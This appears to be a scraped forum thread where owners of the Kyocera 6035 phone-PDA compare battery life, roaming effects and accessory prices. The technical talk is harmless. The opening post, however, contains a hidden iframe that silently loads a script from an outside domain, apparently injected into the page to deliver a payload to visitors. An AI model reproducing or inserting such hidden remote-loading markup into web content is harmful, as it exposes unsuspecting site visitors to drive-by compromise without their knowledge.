+ Reply to Thread

Thread: Battery life

new.qcp.6035

Battery life

What has been the average battery time per full charging everyone is getting with the 6035, i know it varies with roaming and usage, but on average how long can you generally go(days)before your next full charge?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've only had the phone for maybe a month so I've been a little curious about this myself.

Here in the Houston area I've so far been able to go from a Saturday morning (6am) to Monday night (9 pm). Using about 2 1/2 hours + of talking and light web browsing and email over the weekend. Finally dropped to 1/4 bar on battery before I put it back in charger at work.

I'm happy so far.

Anyone else?
    James
    Remember, When the long night comes return to the end of the beginning.

Off a full charge I can go a full week using the Palm and cellphone features, never turn the phone off and I still have one bar left on the battery meter.

I could never get away with that with my Startac.

I know I've done long weekends (3 full days) without a recharge. My problem is that everytime I come to the office the '35 goes in the cradle. That way I know where it is.

Normal reflex also includes pressing the HotSync button too.

Three days with moderate use and never seen the battery below 50%. And I've got a spare battery JIC, but I've never HAD to put it in.

I'm not aware of another PDA/Cellphone combination with battery life like the '35.

I have two batteries, keeping one charged at all times. I usually make it between 4 to 5 days between swaps. The two battery concern works best for me cause I'm always on the go.

--terry

[QUOTE][i:4f948bdd36]Originally posted by hatman [/i:4f948bdd36]
    [B]I know I've done long weekends (3 full days) without a recharge. My problem is that everytime I come to the office the '35 goes in the cradle. That way I know where it is.

I do that often because I might forget where I put it.

I suffer from EASS!
    Early
    Alzheimer's
    Simulation
    Syndrome

BTW,

Does any one know where I can find an extra charging cradle? All the ones on Ebay come in kits with lots of stuff. I had ordered a kit with the battery and stuff but no charger/sync cradle.
    mogur2

mogur2,

Yeah, I resemble that! EASS - have to remember that. "Now what were those initials?"

To the point, you can get the Sync Crade at the Online Kyocera Store but be prepared for a shock. They want $69.99 for that bad boy! And that's without the charger which is another $29.99. Let's see that $99.98 which is what you can get an entire new phone for at Verizon. You might want to just go for a spare phone with all the accessories and at least you'll have another phone.

"Why would I ever need another phone?" You could be in the situation I'm in right now. My primary phone's been at the Verizon Hospital for four weeks now. Without my spare phone I'd have been using some five year old analog hand-me-down. Of course I could have resurrected the old StarTac 7760 from the cellphone museum here and gone with that I'm sure.

One other option would be doing the data cable and travel charger. I know that doesn't easily charge that spare battery, but with the data cable at $39.99 the total combination is only $69.98. The Verizon store has the data cable for $29.99 too. You can also get a 15% discount on your first order at the Kyo online store.

I know - too many options.

Forgive my rambling......

Marc_Fou
    Well, so far I am going on 4 days after a full charge and I am using the Palm OS and App;ications about 4 hours a day. Wireless web 1 hour a day and voice about 1 hour a day and the phone is always on. Currently 50% power remaining.

I have my sleep feature set at 3 minutes.

I have no use for my cradle/sparebattery charger combo. It has a serial connector. My laptop is USB only, and I'd rather have a hotsync cable anyway, as this cradle is _way_ too bulky for travel. Email me and we could arrange something.
    -rane

So should I be worried if I am making it barely two days?

I just got my phone a week ago. I charged the battery overnight Wednesday (to Thursday morning) and it is down to one bar this morning. Should I run back to Verizon now for another battery? I use the PALM a lot but have made less than one hour of phone calls since charging.

bam
    If I leave the phone on, and with 10-20 minutes of talking, I seem to get about 20 hours in analog mode before it goes down to 1 bar. I've not run it all the way down yet, but that might be an interesting experiement for this weekend.

Battery life is one reason I switched - with my startac 7868, I was getting about 6-8 hours with no talking before I needed a recharge.

Analog mode is the hardest on battery life.

That's why some of the older phones had such BIG batteries.

In Analog mode you should also consider buying a car charger to extend the life.
    Remember, When the long night comes return to the end of the beginning.

I can only get 24 hours of battery time--even if I don't talk at all--but I'm guessing this might be due to Sprint's coverage of the foothills in Colorado? My phone has never held a charge as long as all of yours; perhaps I should try turning off the roaming and see if it improves. Otherwise time for a new battery.

[quote:1dbc675d0d="Patch"]I can only get 24 hours of battery time--even if I don't talk at all--but I'm guessing this might be due to Sprint's coverage of the foothills in Colorado? My phone has never held a charge as long as all of yours; perhaps I should try turning off the roaming and see if it improves. Otherwise time for a new battery. [/quote:1dbc675d0d]

That is probably your problem.... using the roam service will take a lot more battery from your phone than the sprint digital service... try disabling it
    -=Jimmyjoe=-

Charge it once a week isn't

much of a problem for me... I use the Palm tons, and about 300 peak and 150 offpeak minutes/month. It's a battery pamperer, this 6035. Marvelous product. And to think I got mine free, after rebate! lol

I got mine free too. Corporation paid for it. God Bless America.

I agree on analog mode (Also no-service mode) being bad for batteries, even on standby.

With a good digital signal my old 2035 could go DAYS in standby.

Leave it on my kitchen table at home (= dead spot, phone says "searching"), battery dead in &lt;12 hours.

To the guy in Colorado - If your phone isn't indicating digital mode, that would explain your problem. Even if you set it to no-roam, it'll probably have bad battery life because it's actively searching for a tower that is a non-roaming tower.

The reception of my 6035 seems marginally better than my 2035, which is a Good Thing for battry life. My 2035 typically started dropping in and out of analog mode (= roaming) at work, the 6035 hasn't dropped the digital signal or flashed the R icon at all yet.

Will battery charge while you are talking on the phone?

My current Kyocera phone will not charge while I am talking on the phone. Apparently this was a design choice to cost reduce the phone.

Does the 7135 operate in the same manner? I didn't see the addressed after searching the archive.

Thanks.

mdarby,

While it is true the phone will not actually "charge" while you are talking, it should continue to work, drawing its power from the charging station. Once you get off the phone, it will revert to charging and then begin rebuilding the battery power.

From my understanding, most phones work this way, at least I know my StarTac did this as well.

Can't give you an answer on the 6035, but the Qualcomm Thinphone's chipset (a predecessor to 6035's) uses almost as much power in cell search (when no signal is available) as when talking. So if you need to extend the battery for some reason, turn off the phone side of the device when out of range.